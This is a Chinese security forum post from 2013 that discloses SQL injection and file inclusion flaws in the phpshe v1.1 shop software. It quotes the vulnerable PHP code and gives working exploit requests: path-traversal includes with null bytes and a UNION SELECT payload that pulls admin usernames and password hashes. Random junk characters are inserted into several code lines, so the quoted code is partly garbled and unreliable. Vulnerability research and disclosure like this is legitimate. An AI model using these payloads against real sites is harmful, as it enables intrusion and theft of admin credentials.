
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell

作者: admin    时间: 2013-4-19 19:01
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0x00 参数传输总览


//common.php
// Bootstrap of request data: every key of GET/POST/SESSION/COOKIE is turned
// into a global variable with a prefix ($_g_*, $_p_*, $_s_*, $_c_*) via
// extract(). Under magic_quotes, GET and POST are first passed through
// pe_stripslashes (presumably undoing the added slashes); COOKIE always is.
// NOTE(review): because extract() is applied to the raw request arrays, any
// name in that prefixed namespace is attacker-controlled from here on.
if (get_magic_quotes_gpc()) {
    if (!empty($_GET)) {
        extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    }
    if (!empty($_POST)) {
        extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
    }
} else {
    if (!empty($_GET)) {
        extract(pe_trim($_GET), EXTR_PREFIX_ALL, '_g');
    }
    if (!empty($_POST)) {
        extract(pe_trim($_POST), EXTR_PREFIX_ALL, '_p');
    }
}
session_start();
if (!empty($_SESSION)) {
    extract(pe_trim($_SESSION), EXTR_PREFIX_ALL, '_s');
}
if (!empty($_COOKIE)) {
    extract(pe_trim(pe_stripslashes($_COOKIE)), EXTR_PREFIX_ALL, '_c');
}
0x01 文件包含漏洞
" p, G( g5 `0 b0 n6 |# m% c! x/ f( z3 q 9 x( n3 R$ S" u3 b
//首页文件
<?php
// index.php: front controller. Loads the shared bootstrap (common.php, which
// also populates the $_g_*/$_p_*/$_s_*/$_c_* request variables), reads the
// cached site data, then dispatches to module/{$module}/{$mod}.php.
include('common.php');
$cache_category = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class = cache::get('class');
$cache_ad = cache::get('ad');
$cache_link = cache::get('link');
$cache_page = cache::get('page');
// $cache_setting is not assigned on this page — presumably set up in common.php; verify.
$web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array();
// Cart badge: DB count for a logged-in user, otherwise the serialized cart
// cookie is unserialize()d. $_c_cart_list comes straight from $_COOKIE via
// extract() in common.php, so this is unserialize() on client-controlled data.
$cart_num = pe_login('user') ? $db->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
// $mod is taken from the request in common.php; no allow-list check on it is
// visible on this page before it becomes part of the include path.
include("{$pe['path_root']}module/{$module}/{$mod}.php");  // $mod is attacker-controlled, giving a (limited) file-inclusion issue
pe_result();
?>
//common.php 文件，第15行开始
url路由配置
// URL routing: module, mod and act all default to 'index'; POST wins over GET.
$module = $mod = $act = 'index';
// Plain truthiness tests, so '0' or '' fall through to the default.
// NOTE(review): $mod is later used as an include() path component (see
// index.php) and no allow-list check on it is visible on this page.
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
// $id has no default above, so when neither source sets it the fallback reads an undefined variable.
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
: H' s$ J0 w% A3 U) O8 D//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00


0x02 搜索处SQL注入
<code id="code2">

//product.php文件
case 'list':
# V' a% o) H8 ]7 v0 p  P$category_id = intval($id);9 i" j) @/ r) d5 F7 [4 J
$info = $db->pe_select('category', array('category_id'=>$category_id));, }6 S* G/ A) f3 t1 f/ t6 k: u
//搜索  n- _9 o% U1 d7 b
$sqlwhere = " and `product_state` = 1";
" @8 k4 h" v0 k, zpe_lead('hook/category.hook.php');
( s( e3 m! J. G8 Y$ j9 iif ($category_id) {
, g6 t& h9 z  E  d1 J9 xwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
0 O8 j& g. }7 O& J) z}
. _1 E* P* p8 J$ J" S# q$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤* L; q8 Z5 v% @
if ($_g_orderby) {
9 Z% e3 L; O- V/ q$orderby = explode('_', $_g_orderby);
8 d9 F* P' q* _( ^$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";0 b. s) l9 u2 H' O
}
3 [+ b# [9 {1 _6 j1 k) g* _else {
5 X2 \9 n0 z4 q' O! J" K, T! M$sqlwhere .= " order by `product_id` desc";
+ b! U6 E7 V+ ^  K% ^}3 y" r/ U7 K' p8 l+ b: h1 p
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
1 z' F4 L( {; A! x9 V& |//热卖排行
  g+ f6 J; K9 K1 J: f3 R% q) m$product_hotlist = product_hotlist();
# n' ]3 u# S- Y4 h( N+ {) ~//当前路径
1 B7 X/ L  h( V- P$ t8 j2 L$nowpath = category_path($category_id);. g( [1 l: ~9 Z* c- \) `' R
$seo = pe_seo($info['category_name']);
0 J! k/ H0 J5 pinclude(pe_tpl('product_list.html'));
//跟进 pe_selectall 函数
/**
 * Select rows from the prefixed table and hand the query to sql_selectall().
 *
 * @param string       $table      table name without the dbpre prefix
 * @param array|string $where      condition; arrays and raw SQL strings both
 *                                 reach _dowhere() (both forms appear at the call sites)
 * @param string       $field      column list spliced verbatim into the SELECT
 * @param array        $limit_page pagination spec forwarded to sql_selectall()
 *                                 (call sites pass array(16, $_g_page))
 * @return mixed whatever sql_selectall() returns
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // Only $where goes through _dowhere(); $table and $field are interpolated
    // as-is, so callers must keep them trusted.
    $condition = $this->_dowhere($where);
    $query = "select {$field} from `" . dbpre . "{$table}` {$condition}";

    return $this->sql_selectall($query, $limit_page);
}
//exp
' H4 p- Z0 Y8 v4 s  g! ^  _product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1* n7 V7 Z* ?! k8 {! e8 T/ h0 B

</code>
0x03 文件包含漏洞 2
<code id="code3">

//order.php

case 'pay':

$order_id = pe_dbhold($_g_id);


; X/ E8 u9 g6 u) f2 C* N: l$cache_payway = cache::get('payway');

foreach($cache_payway as $k => $v) {


# c! Y7 @6 J9 E6 k- c* h$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

if ($k == 'bank') {

$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

}


# ?1 Q$ W1 w: J2 l. n) W  T& G$ x}


# U# x! k* [* J8 J% m" }8 l$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


4 D, a0 s5 m, G! W. l5 A!$order['order_id'] && pe_error('订单号错误...');

if (isset($_p_pesubmit)) {


' l" N6 r- A% u$ kif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

foreach ($info_list as $v) {


2 Z. e' ?/ _( j8 Y5 B% j' s$order['order_name'] .= "{$v['product_name']};";' O* [* k7 Q6 o

}

echo '正在为您连接支付网站,请稍后...';

include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


) e5 Q, n. Q6 T. j6 `, e. c}//当一切准备好的时候就可以进行"鸡肋包含了"


+ X) G4 M% r- belse {

pe_error('支付错误...');

}

}


7 v6 x* i& _; `3 K: l) D: }$seo = pe_seo('选择支付方式');


* M% v& l& L4 v, l* v& U% n8 Pinclude(pe_tpl('order_pay.html'));


9 \0 W$ b6 i9 Xbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>



